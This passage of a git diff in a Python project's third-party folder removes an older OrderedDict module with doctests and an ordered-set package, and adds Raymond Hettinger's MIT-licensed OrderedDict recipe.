copy(self): - """ - >>> OrderedDict(((1, 3), (3, 2), (2, 1))).copy() - OrderedDict([(1, 3), (3, 2), (2, 1)]) - """ - return OrderedDict(self) - - def items(self): - """ - ``items`` returns a list of tuples representing all the - ``(key, value)`` pairs in the dictionary. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.items() - [(1, 3), (3, 2), (2, 1)] - >>> d.clear() - >>> d.items() - [] - """ - return zip(self._sequence, self.values()) - - def keys(self): - """ - Return a list of keys in the ``OrderedDict``. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.keys() - [1, 3, 2] - """ - return self._sequence[:] - - def values(self, values=None): - """ - Return a list of all the values in the OrderedDict. - - Optionally you can pass in a list of values, which will replace the - current list. The value list must be the same len as the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.values() - [3, 2, 1] - """ - return [self[key] for key in self._sequence] - - def iteritems(self): - """ - >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iteritems() - >>> ii.next() - (1, 3) - >>> ii.next() - (3, 2) - >>> ii.next() - (2, 1) - >>> ii.next() - Traceback (most recent call last): - StopIteration - """ - def make_iter(self=self): - keys = self.iterkeys() - while True: - key = keys.next() - yield (key, self[key]) - return make_iter() - - def iterkeys(self): - """ - >>> ii = OrderedDict(((1, 3), (3, 2), (2, 1))).iterkeys() - >>> ii.next() - 1 - >>> ii.next() - 3 - >>> ii.next() - 2 - >>> ii.next() - Traceback (most recent call last): - StopIteration - """ - return iter(self._sequence) - - __iter__ = iterkeys - - def itervalues(self): - """ - >>> iv = OrderedDict(((1, 3), (3, 2), (2, 1))).itervalues() - >>> iv.next() - 3 - >>> iv.next() - 2 - >>> iv.next() - 1 - >>> iv.next() - Traceback (most recent call last): - StopIteration - """ - def make_iter(self=self): - keys = self.iterkeys() - while True: - yield self[keys.next()] - return make_iter() - -### Read-write methods ### - - def clear(self): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.clear() - >>> d - OrderedDict([]) - """ - dict.clear(self) - self._sequence = [] - - def pop(self, key, *args): - """ - No dict.pop in Python 2.2, gotta reimplement it - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.pop(3) - 2 - >>> d - OrderedDict([(1, 3), (2, 1)]) - >>> d.pop(4) - Traceback (most recent call last): - KeyError: 4 - >>> d.pop(4, 0) - 0 - >>> d.pop(4, 0, 1) - Traceback (most recent call last): - TypeError: pop expected at most 2 arguments, got 3 - """ - if len(args) > 1: - raise TypeError, ('pop expected at most 2 arguments, got %s' % - (len(args) + 1)) - if key in self: - val = self[key] - del self[key] - else: - try: - val = args[0] - except IndexError: - raise KeyError(key) - return val - - def popitem(self, i=-1): - """ - Delete and return an item specified by index, not a random one as in - dict. The index is -1 by default (the last item). - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.popitem() - (2, 1) - >>> d - OrderedDict([(1, 3), (3, 2)]) - >>> d.popitem(0) - (1, 3) - >>> OrderedDict().popitem() - Traceback (most recent call last): - KeyError: 'popitem(): dictionary is empty' - >>> d.popitem(2) - Traceback (most recent call last): - IndexError: popitem(): index 2 not valid - """ - if not self._sequence: - raise KeyError('popitem(): dictionary is empty') - try: - key = self._sequence[i] - except IndexError: - raise IndexError('popitem(): index %s not valid' % i) - return (key, self.pop(key)) - - def setdefault(self, key, defval = None): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.setdefault(1) - 3 - >>> d.setdefault(4) is None - True - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1), (4, None)]) - >>> d.setdefault(5, 0) - 0 - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1), (4, None), (5, 0)]) - """ - if key in self: - return self[key] - else: - self[key] = defval - return defval - - def update(self, from_od): - """ - Update from another OrderedDict or sequence of (key, value) pairs - - >>> d = OrderedDict(((1, 0), (0, 1))) - >>> d.update(OrderedDict(((1, 3), (3, 2), (2, 1)))) - >>> d - OrderedDict([(1, 3), (0, 1), (3, 2), (2, 1)]) - >>> d.update({4: 4}) - Traceback (most recent call last): - TypeError: undefined order, cannot get items from dict - >>> d.update((4, 4)) - Traceback (most recent call last): - TypeError: cannot convert dictionary update sequence element "4" to a 2-item sequence - """ - if isinstance(from_od, OrderedDict): - for key, val in from_od.items(): - self[key] = val - elif isinstance(from_od, dict): - # we lose compatibility with other ordered dict types this way - raise TypeError('undefined order, cannot get items from dict') - else: - # FIXME: efficiency? - # sequence of 2-item sequences, or error - for item in from_od: - try: - key, val = item - except TypeError: - raise TypeError('cannot convert dictionary update' - ' sequence element "%s" to a 2-item sequence' % item) - self[key] = val - - def rename(self, old_key, new_key): - """ - Rename the key for a given value, without modifying sequence order. - - For the case where new_key already exists this raise an exception, - since if new_key exists, it is ambiguous as to what happens to the - associated values, and the position of new_key in the sequence. - - >>> od = OrderedDict() - >>> od['a'] = 1 - >>> od['b'] = 2 - >>> od.items() - [('a', 1), ('b', 2)] - >>> od.rename('b', 'c') - >>> od.items() - [('a', 1), ('c', 2)] - >>> od.rename('c', 'a') - Traceback (most recent call last): - ValueError: New key already exists: 'a' - >>> od.rename('d', 'b') - Traceback (most recent call last): - KeyError: 'd' - """ - if new_key == old_key: - # no-op - return - if new_key in self: - raise ValueError("New key already exists: %r" % new_key) - # rename sequence entry - value = self[old_key] - old_idx = self._sequence.index(old_key) - self._sequence[old_idx] = new_key - # rename internal dict entry - dict.__delitem__(self, old_key) - dict.__setitem__(self, new_key, value) - - def setitems(self, items): - """ - This method allows you to set the items in the dict. - - It takes a list of tuples - of the same sort returned by the ``items`` - method. - - >>> d = OrderedDict() - >>> d.setitems(((3, 1), (2, 3), (1, 2))) - >>> d - OrderedDict([(3, 1), (2, 3), (1, 2)]) - """ - self.clear() - # FIXME: this allows you to pass in an OrderedDict as well :-) - self.update(items) - - def setkeys(self, keys): - """ - ``setkeys`` all ows you to pass in a new list of keys which will - replace the current set. This must contain the same set of keys, but - need not be in the same order. - - If you pass in new keys that don't match, a ``KeyError`` will be - raised. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.keys() - [1, 3, 2] - >>> d.setkeys((1, 2, 3)) - >>> d - OrderedDict([(1, 3), (2, 1), (3, 2)]) - >>> d.setkeys(['a', 'b', 'c']) - Traceback (most recent call last): - KeyError: 'Keylist is not the same as current keylist.' - """ - # FIXME: Efficiency? (use set for Python 2.4 :-) - # NOTE: list(keys) rather than keys[:] because keys[:] returns - # a tuple, if keys is a tuple. - kcopy = list(keys) - kcopy.sort() - self._sequence.sort() - if kcopy != self._sequence: - raise KeyError('Keylist is not the same as current keylist.') - # NOTE: This makes the _sequence attribute a new object, instead - # of changing it in place. - # FIXME: efficiency? - self._sequence = list(keys) - - def setvalues(self, values): - """ - You can pass in a list of values, which will replace the - current list. The value list must be the same len as the OrderedDict. - - (Or a ``ValueError`` is raised.) - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.setvalues((1, 2, 3)) - >>> d - OrderedDict([(1, 1), (3, 2), (2, 3)]) - >>> d.setvalues([6]) - Traceback (most recent call last): - ValueError: Value list is not the same length as the OrderedDict. - """ - if len(values) != len(self): - # FIXME: correct error to raise? - raise ValueError('Value list is not the same length as the ' - 'OrderedDict.') - self.update(zip(self, values)) - -### Sequence Methods ### - - def index(self, key): - """ - Return the position of the specified key in the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.index(3) - 1 - >>> d.index(4) - Traceback (most recent call last): - ValueError: list.index(x): x not in list - """ - return self._sequence.index(key) - - def insert(self, index, key, value): - """ - Takes ``index``, ``key``, and ``value`` as arguments. - - Sets ``key`` to ``value``, so that ``key`` is at position ``index`` in - the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.insert(0, 4, 0) - >>> d - OrderedDict([(4, 0), (1, 3), (3, 2), (2, 1)]) - >>> d.insert(0, 2, 1) - >>> d - OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2)]) - >>> d.insert(8, 8, 1) - >>> d - OrderedDict([(2, 1), (4, 0), (1, 3), (3, 2), (8, 1)]) - """ - if key in self: - # FIXME: efficiency? - del self[key] - self._sequence.insert(index, key) - dict.__setitem__(self, key, value) - - def reverse(self): - """ - Reverse the order of the OrderedDict. - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.reverse() - >>> d - OrderedDict([(2, 1), (3, 2), (1, 3)]) - """ - self._sequence.reverse() - - def sort(self, *args, **kwargs): - """ - Sort the key order in the OrderedDict. - - This method takes the same arguments as the ``list.sort`` method on - your version of Python. - - >>> d = OrderedDict(((4, 1), (2, 2), (3, 3), (1, 4))) - >>> d.sort() - >>> d - OrderedDict([(1, 4), (2, 2), (3, 3), (4, 1)]) - """ - self._sequence.sort(*args, **kwargs) - -if INTP_VER >= (2, 7): - from collections import OrderedDict -else: - OrderedDict = _OrderedDict - -class Keys(object): - # FIXME: should this object be a subclass of list? - """ - Custom object for accessing the keys of an OrderedDict. - - Can be called like the normal ``OrderedDict.keys`` method, but also - supports indexing and sequence methods. - """ - - def __init__(self, main): - self._main = main - - def __call__(self): - """Pretend to be the keys method.""" - return self._main._keys() - - def __getitem__(self, index): - """Fetch the key at position i.""" - # NOTE: this automatically supports slicing :-) - return self._main._sequence[index] - - def __setitem__(self, index, name): - """ - You cannot assign to keys, but you can do slice assignment to re-order - them. - - You can only do slice assignment if the new set of keys is a reordering - of the original set. - """ - if isinstance(index, types.SliceType): - # FIXME: efficiency? - # check length is the same - indexes = range(len(self._main._sequence))[index] - if len(indexes) != len(name): - raise ValueError('attempt to assign sequence of size %s ' - 'to slice of size %s' % (len(name), len(indexes))) - # check they are the same keys - # FIXME: Use set - old_keys = self._main._sequence[index] - new_keys = list(name) - old_keys.sort() - new_keys.sort() - if old_keys != new_keys: - raise KeyError('Keylist is not the same as current keylist.') - orig_vals = [self._main[k] for k in name] - del self._main[index] - vals = zip(indexes, name, orig_vals) - vals.sort() - for i, k, v in vals: - if self._main.strict and k in self._main: - raise ValueError('slice assignment must be from ' - 'unique keys') - self._main.insert(i, k, v) - else: - raise ValueError('Cannot assign to keys') - - ### following methods pinched from UserList and adapted ### - def __repr__(self): return repr(self._main._sequence) - - # FIXME: do we need to check if we are comparing with another ``Keys`` - # object? (like the __cast method of UserList) - def __lt__(self, other): return self._main._sequence < other - def __le__(self, other): return self._main._sequence <= other - def __eq__(self, other): return self._main._sequence == other - def __ne__(self, other): return self._main._sequence != other - def __gt__(self, other): return self._main._sequence > other - def __ge__(self, other): return self._main._sequence >= other - # FIXME: do we need __cmp__ as well as rich comparisons? - def __cmp__(self, other): return cmp(self._main._sequence, other) - - def __contains__(self, item): return item in self._main._sequence - def __len__(self): return len(self._main._sequence) - def __iter__(self): return self._main.iterkeys() - def count(self, item): return self._main._sequence.count(item) - def index(self, item, *args): return self._main._sequence.index(item, *args) - def reverse(self): self._main._sequence.reverse() - def sort(self, *args, **kwds): self._main._sequence.sort(*args, **kwds) - def __mul__(self, n): return self._main._sequence*n - __rmul__ = __mul__ - def __add__(self, other): return self._main._sequence + other - def __radd__(self, other): return other + self._main._sequence - - ## following methods not implemented for keys ## - def __delitem__(self, i): raise TypeError('Can\'t delete items from keys') - def __iadd__(self, other): raise TypeError('Can\'t add in place to keys') - def __imul__(self, n): raise TypeError('Can\'t multiply keys in place') - def append(self, item): raise TypeError('Can\'t append items to keys') - def insert(self, i, item): raise TypeError('Can\'t insert items into keys') - def pop(self, i=-1): raise TypeError('Can\'t pop items from keys') - def remove(self, item): raise TypeError('Can\'t remove items from keys') - def extend(self, other): raise TypeError('Can\'t extend keys') - -class Items(object): - """ - Custom object for accessing the items of an OrderedDict. - - Can be called like the normal ``OrderedDict.items`` method, but also - supports indexing and sequence methods. - """ - - def __init__(self, main): - self._main = main - - def __call__(self): - """Pretend to be the items method.""" - return self._main._items() - - def __getitem__(self, index): - """Fetch the item at position i.""" - if isinstance(index, types.SliceType): - # fetching a slice returns an OrderedDict - return self._main[index].items() - key = self._main._sequence[index] - return (key, self._main[key]) - - def __setitem__(self, index, item): - """Set item at position i to item.""" - if isinstance(index, types.SliceType): - # NOTE: item must be an iterable (list of tuples) - self._main[index] = OrderedDict(item) - else: - # FIXME: Does this raise a sensible error? - orig = self._main.keys[index] - key, value = item - if self._main.strict and key in self and (key != orig): - raise ValueError('slice assignment must be from ' - 'unique keys') - # delete the current one - del self._main[self._main._sequence[index]] - self._main.insert(index, key, value) - - def __delitem__(self, i): - """Delete the item at position i.""" - key = self._main._sequence[i] - if isinstance(i, types.SliceType): - for k in key: - # FIXME: efficiency? - del self._main[k] - else: - del self._main[key] - - ### following methods pinched from UserList and adapted ### - def __repr__(self): return repr(self._main.items()) - - # FIXME: do we need to check if we are comparing with another ``Items`` - # object? (like the __cast method of UserList) - def __lt__(self, other): return self._main.items() < other - def __le__(self, other): return self._main.items() <= other - def __eq__(self, other): return self._main.items() == other - def __ne__(self, other): return self._main.items() != other - def __gt__(self, other): return self._main.items() > other - def __ge__(self, other): return self._main.items() >= other - def __cmp__(self, other): return cmp(self._main.items(), other) - - def __contains__(self, item): return item in self._main.items() - def __len__(self): return len(self._main._sequence) # easier :-) - def __iter__(self): return self._main.iteritems() - def count(self, item): return self._main.items().count(item) - def index(self, item, *args): return self._main.items().index(item, *args) - def reverse(self): self._main.reverse() - def sort(self, *args, **kwds): self._main.sort(*args, **kwds) - def __mul__(self, n): return self._main.items()*n - __rmul__ = __mul__ - def __add__(self, other): return self._main.items() + other - def __radd__(self, other): return other + self._main.items() - - def append(self, item): - """Add an item to the end.""" - # FIXME: this is only append if the key isn't already present - key, value = item - self._main[key] = value - - def insert(self, i, item): - key, value = item - self._main.insert(i, key, value) - - def pop(self, i=-1): - key = self._main._sequence[i] - return (key, self._main.pop(key)) - - def remove(self, item): - key, value = item - try: - assert value == self._main[key] - except (KeyError, AssertionError): - raise ValueError('ValueError: list.remove(x): x not in list') - else: - del self._main[key] - - def extend(self, other): - # FIXME: is only a true extend if none of the keys already present - for item in other: - key, value = item - self._main[key] = value - - def __iadd__(self, other): - self.extend(other) - - ## following methods not implemented for items ## - - def __imul__(self, n): raise TypeError('Can\'t multiply items in place') - -class Values(object): - """ - Custom object for accessing the values of an OrderedDict. - - Can be called like the normal ``OrderedDict.values`` method, but also - supports indexing and sequence methods. - """ - - def __init__(self, main): - self._main = main - - def __call__(self): - """Pretend to be the values method.""" - return self._main._values() - - def __getitem__(self, index): - """Fetch the value at position i.""" - if isinstance(index, types.SliceType): - return [self._main[key] for key in self._main._sequence[index]] - else: - return self._main[self._main._sequence[index]] - - def __setitem__(self, index, value): - """ - Set the value at position i to value. - - You can only do slice assignment to values if you supply a sequence of - equal length to the slice you are replacing. - """ - if isinstance(index, types.SliceType): - keys = self._main._sequence[index] - if len(keys) != len(value): - raise ValueError('attempt to assign sequence of size %s ' - 'to slice of size %s' % (len(name), len(keys))) - # FIXME: efficiency? Would be better to calculate the indexes - # directly from the slice object - # NOTE: the new keys can collide with existing keys (or even - # contain duplicates) - these will overwrite - for key, val in zip(keys, value): - self._main[key] = val - else: - self._main[self._main._sequence[index]] = value - - ### following methods pinched from UserList and adapted ### - def __repr__(self): return repr(self._main.values()) - - # FIXME: do we need to check if we are comparing with another ``Values`` - # object? (like the __cast method of UserList) - def __lt__(self, other): return self._main.values() < other - def __le__(self, other): return self._main.values() <= other - def __eq__(self, other): return self._main.values() == other - def __ne__(self, other): return self._main.values() != other - def __gt__(self, other): return self._main.values() > other - def __ge__(self, other): return self._main.values() >= other - def __cmp__(self, other): return cmp(self._main.values(), other) - - def __contains__(self, item): return item in self._main.values() - def __len__(self): return len(self._main._sequence) # easier :-) - def __iter__(self): return self._main.itervalues() - def count(self, item): return self._main.values().count(item) - def index(self, item, *args): return self._main.values().index(item, *args) - - def reverse(self): - """Reverse the values""" - vals = self._main.values() - vals.reverse() - # FIXME: efficiency - self[:] = vals - - def sort(self, *args, **kwds): - """Sort the values.""" - vals = self._main.values() - vals.sort(*args, **kwds) - self[:] = vals - - def __mul__(self, n): return self._main.values()*n - __rmul__ = __mul__ - def __add__(self, other): return self._main.values() + other - def __radd__(self, other): return other + self._main.values() - - ## following methods not implemented for values ## - def __delitem__(self, i): raise TypeError('Can\'t delete items from values') - def __iadd__(self, other): raise TypeError('Can\'t add in place to values') - def __imul__(self, n): raise TypeError('Can\'t multiply values in place') - def append(self, item): raise TypeError('Can\'t append items to values') - def insert(self, i, item): raise TypeError('Can\'t insert items into values') - def pop(self, i=-1): raise TypeError('Can\'t pop items from values') - def remove(self, item): raise TypeError('Can\'t remove items from values') - def extend(self, other): raise TypeError('Can\'t extend values') - -class SequenceOrderedDict(OrderedDict): - """ - Experimental version of OrderedDict that has a custom object for ``keys``, - ``values``, and ``items``. - - These are callable sequence objects that work as methods, or can be - manipulated directly as sequences. - - Test for ``keys``, ``items`` and ``values``. - - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.keys - [1, 2, 3] - >>> d.keys() - [1, 2, 3] - >>> d.setkeys((3, 2, 1)) - >>> d - SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) - >>> d.setkeys((1, 2, 3)) - >>> d.keys[0] - 1 - >>> d.keys[:] - [1, 2, 3] - >>> d.keys[-1] - 3 - >>> d.keys[-2] - 2 - >>> d.keys[0:2] = [2, 1] - >>> d - SequenceOrderedDict([(2, 3), (1, 2), (3, 4)]) - >>> d.keys.reverse() - >>> d.keys - [3, 1, 2] - >>> d.keys = [1, 2, 3] - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.keys = [3, 1, 2] - >>> d - SequenceOrderedDict([(3, 4), (1, 2), (2, 3)]) - >>> a = SequenceOrderedDict() - >>> b = SequenceOrderedDict() - >>> a.keys == b.keys - 1 - >>> a['a'] = 3 - >>> a.keys == b.keys - 0 - >>> b['a'] = 3 - >>> a.keys == b.keys - 1 - >>> b['b'] = 3 - >>> a.keys == b.keys - 0 - >>> a.keys > b.keys - 0 - >>> a.keys < b.keys - 1 - >>> 'a' in a.keys - 1 - >>> len(b.keys) - 2 - >>> 'c' in d.keys - 0 - >>> 1 in d.keys - 1 - >>> [v for v in d.keys] - [3, 1, 2] - >>> d.keys.sort() - >>> d.keys - [1, 2, 3] - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4)), strict=True) - >>> d.keys[::-1] = [1, 2, 3] - >>> d - SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) - >>> d.keys[:2] - [3, 2] - >>> d.keys[:2] = [1, 3] - Traceback (most recent call last): - KeyError: 'Keylist is not the same as current keylist.' - - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.values - [2, 3, 4] - >>> d.values() - [2, 3, 4] - >>> d.setvalues((4, 3, 2)) - >>> d - SequenceOrderedDict([(1, 4), (2, 3), (3, 2)]) - >>> d.values[::-1] - [2, 3, 4] - >>> d.values[0] - 4 - >>> d.values[-2] - 3 - >>> del d.values[0] - Traceback (most recent call last): - TypeError: Can't delete items from values - >>> d.values[::2] = [2, 4] - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> 7 in d.values - 0 - >>> len(d.values) - 3 - >>> [val for val in d.values] - [2, 3, 4] - >>> d.values[-1] = 2 - >>> d.values.count(2) - 2 - >>> d.values.index(2) - 0 - >>> d.values[-1] = 7 - >>> d.values - [2, 3, 7] - >>> d.values.reverse() - >>> d.values - [7, 3, 2] - >>> d.values.sort() - >>> d.values - [2, 3, 7] - >>> d.values.append('anything') - Traceback (most recent call last): - TypeError: Can't append items to values - >>> d.values = (1, 2, 3) - >>> d - SequenceOrderedDict([(1, 1), (2, 2), (3, 3)]) - - >>> d = SequenceOrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - SequenceOrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d.items() - [(1, 2), (2, 3), (3, 4)] - >>> d.setitems([(3, 4), (2 ,3), (1, 2)]) - >>> d - SequenceOrderedDict([(3, 4), (2, 3), (1, 2)]) - >>> d.items[0] - (3, 4) - >>> d.items[:-1] - [(3, 4), (2, 3)] - >>> d.items[1] = (6, 3) - >>> d.items - [(3, 4), (6, 3), (1, 2)] - >>> d.items[1:2] = [(9, 9)] - >>> d - SequenceOrderedDict([(3, 4), (9, 9), (1, 2)]) - >>> del d.items[1:2] - >>> d - SequenceOrderedDict([(3, 4), (1, 2)]) - >>> (3, 4) in d.items - 1 - >>> (4, 3) in d.items - 0 - >>> len(d.items) - 2 - >>> [v for v in d.items] - [(3, 4), (1, 2)] - >>> d.items.count((3, 4)) - 1 - >>> d.items.index((1, 2)) - 1 - >>> d.items.index((2, 1)) - Traceback (most recent call last): - ValueError: list.index(x): x not in list - >>> d.items.reverse() - >>> d.items - [(1, 2), (3, 4)] - >>> d.items.reverse() - >>> d.items.sort() - >>> d.items - [(1, 2), (3, 4)] - >>> d.items.append((5, 6)) - >>> d.items - [(1, 2), (3, 4), (5, 6)] - >>> d.items.insert(0, (0, 0)) - >>> d.items - [(0, 0), (1, 2), (3, 4), (5, 6)] - >>> d.items.insert(-1, (7, 8)) - >>> d.items - [(0, 0), (1, 2), (3, 4), (7, 8), (5, 6)] - >>> d.items.pop() - (5, 6) - >>> d.items - [(0, 0), (1, 2), (3, 4), (7, 8)] - >>> d.items.remove((1, 2)) - >>> d.items - [(0, 0), (3, 4), (7, 8)] - >>> d.items.extend([(1, 2), (5, 6)]) - >>> d.items - [(0, 0), (3, 4), (7, 8), (1, 2), (5, 6)] - """ - - def __init__(self, init_val=(), strict=True): - OrderedDict.__init__(self, init_val, strict=strict) - self._keys = self.keys - self._values = self.values - self._items = self.items - self.keys = Keys(self) - self.values = Values(self) - self.items = Items(self) - self._att_dict = { - 'keys': self.setkeys, - 'items': self.setitems, - 'values': self.setvalues, - } - - def __setattr__(self, name, value): - """Protect keys, items, and values.""" - if not '_att_dict' in self.__dict__: - object.__setattr__(self, name, value) - else: - try: - fun = self._att_dict[name] - except KeyError: - OrderedDict.__setattr__(self, name, value) - else: - fun(value) - -if __name__ == '__main__': - if INTP_VER < (2, 3): - raise RuntimeError("Tests require Python v.2.3 or later") - # turn off warnings for tests - warnings.filterwarnings('ignore') - # run the code tests in doctest format - import doctest - m = sys.modules.get('__main__') - globs = m.__dict__.copy() - globs.update({ - 'INTP_VER': INTP_VER, - }) - doctest.testmod(m, globs=globs) - diff --git a/thirdparty/odict/ordereddict.py b/thirdparty/odict/ordereddict.py new file mode 100644 index 00000000000..1cdd6f46edc --- /dev/null +++ b/thirdparty/odict/ordereddict.py @@ -0,0 +1,133 @@ +# Copyright (c) 2009 Raymond Hettinger +# +# Permission is hereby granted, free of charge, to any person +# obtaining a copy of this software and associated documentation files +# (the "Software"), to deal in the Software without restriction, +# including without limitation the rights to use, copy, modify, merge, +# publish, distribute, sublicense, and/or sell copies of the Software, +# and to permit persons to whom the Software is furnished to do so, +# subject to the following conditions: +# +# The above copyright notice and this permission notice shall be +# included in all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, +# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES +# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT +# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR +# OTHER DEALINGS IN THE SOFTWARE. + +try: + from UserDict import DictMixin +except ImportError: + try: + from collections.abc import MutableMapping as DictMixin + except ImportError: + from collections import MutableMapping as DictMixin + +class OrderedDict(dict, DictMixin): + + def __init__(self, *args, **kwds): + if len(args) > 1: + raise TypeError('expected at most 1 arguments, got %d' % len(args)) + try: + self.__end + except AttributeError: + self.clear() + self.update(*args, **kwds) + + def clear(self): + self.__end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.__map = {} # key --> [key, prev, next] + dict.clear(self) + + def __setitem__(self, key, value): + if key not in self: + end = self.__end + curr = end[1] + curr[2] = end[1] = self.__map[key] = [key, curr, end] + dict.__setitem__(self, key, value) + + def __delitem__(self, key): + dict.__delitem__(self, key) + key, prev, next = self.__map.pop(key) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.__end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.__end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def popitem(self, last=True): + if not self: + raise KeyError('dictionary is empty') + if last: + key = next(reversed(self)) + else: + key = next(iter(self)) + value = self.pop(key) + return key, value + + def __reduce__(self): + items = [[k, self[k]] for k in self] + tmp = self.__map, self.__end + del self.__map, self.__end + inst_dict = vars(self).copy() + self.__map, self.__end = tmp + if inst_dict: + return (self.__class__, (items,), inst_dict) + return self.__class__, (items,) + + def keys(self): + return list(self) + + setdefault = DictMixin.setdefault + update = DictMixin.update + pop = DictMixin.pop + values = DictMixin.values + items = DictMixin.items + iterkeys = DictMixin.iterkeys + itervalues = DictMixin.itervalues + iteritems = DictMixin.iteritems + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, list(self.items())) + + def copy(self): + return self.__class__(self) + + @classmethod + def fromkeys(cls, iterable, value=None): + d = cls() + for key in iterable: + d[key] = value + return d + + def __eq__(self, other): + if isinstance(other, OrderedDict): + if len(self) != len(other): + return False + for p, q in zip(self.items(), other.items()): + if p != q: + return False + return True + return dict.__eq__(self, other) + + def __ne__(self, other): + return not self == other diff --git a/thirdparty/oset/LICENSE.txt b/thirdparty/oset/LICENSE.txt deleted file mode 100644 index aef85dda33c..00000000000 --- a/thirdparty/oset/LICENSE.txt +++ /dev/null @@ -1,29 +0,0 @@ -License -======= - -Copyright (c) 2009, Raymond Hettinger, and others -All rights reserved. - -Package structured based on the one developed to odict -Copyright (c) 2010, BlueDynamics Alliance, Austria - - -* Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. -* Redistributions in binary form must reproduce the above copyright notice, this - list of conditions and the following disclaimer in the documentation and/or - other materials provided with the distribution. -* Neither the name of the BlueDynamics Alliance nor the names of its - contributors may be used to endorse or promote products derived from this - software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY BlueDynamics Alliance ``AS IS`` AND ANY -EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL BlueDynamics Alliance BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/thirdparty/oset/__init__.py b/thirdparty/oset/__init__.py deleted file mode 100644 index 688b31e9230..00000000000 --- a/thirdparty/oset/__init__.py +++ /dev/null @@ -1,3 +0,0 @@ -"""Main Ordered Set module """ - -from pyoset import oset diff --git a/thirdparty/oset/_abc.py b/thirdparty/oset/_abc.py deleted file mode 100644 index d3cf1b51ef1..00000000000 --- a/thirdparty/oset/_abc.py +++ /dev/null @@ -1,476 +0,0 @@ -#!/usr/bin/env python -# -*- mode:python; tab-width: 2; coding: utf-8 -*- - -"""Partially backported python ABC classes""" - -from __future__ import absolute_import - -import sys -import types - -if sys.version_info > (2, 6): - raise ImportError("Use native ABC classes istead of this one.") - - -# Instance of old-style class -class _C: - pass - -_InstanceType = type(_C()) - - -def abstractmethod(funcobj): - """A decorator indicating abstract methods. - - Requires that the metaclass is ABCMeta or derived from it. A - class that has a metaclass derived from ABCMeta cannot be - instantiated unless all of its abstract methods are overridden. - The abstract methods can be called using any of the normal - 'super' call mechanisms. - - Usage: - - class C: - __metaclass__ = ABCMeta - @abstractmethod - def my_abstract_method(self, ...): - ... - """ - funcobj.__isabstractmethod__ = True - return funcobj - - -class ABCMeta(type): - - """Metaclass for defining Abstract Base Classes (ABCs). - - Use this metaclass to create an ABC. An ABC can be subclassed - directly, and then acts as a mix-in class. You can also register - unrelated concrete classes (even built-in classes) and unrelated - ABCs as 'virtual subclasses' -- these and their descendants will - be considered subclasses of the registering ABC by the built-in - issubclass() function, but the registering ABC won't show up in - their MRO (Method Resolution Order) nor will method - implementations defined by the registering ABC be callable (not - even via super()). - - """ - - # A global counter that is incremented each time a class is - # registered as a virtual subclass of anything. It forces the - # negative cache to be cleared before its next use. - _abc_invalidation_counter = 0 - - def __new__(mcls, name, bases, namespace): - cls = super(ABCMeta, mcls).__new__(mcls, name, bases, namespace) - # Compute set of abstract method names - abstracts = set(name - for name, value in namespace.items() - if getattr(value, "__isabstractmethod__", False)) - for base in bases: 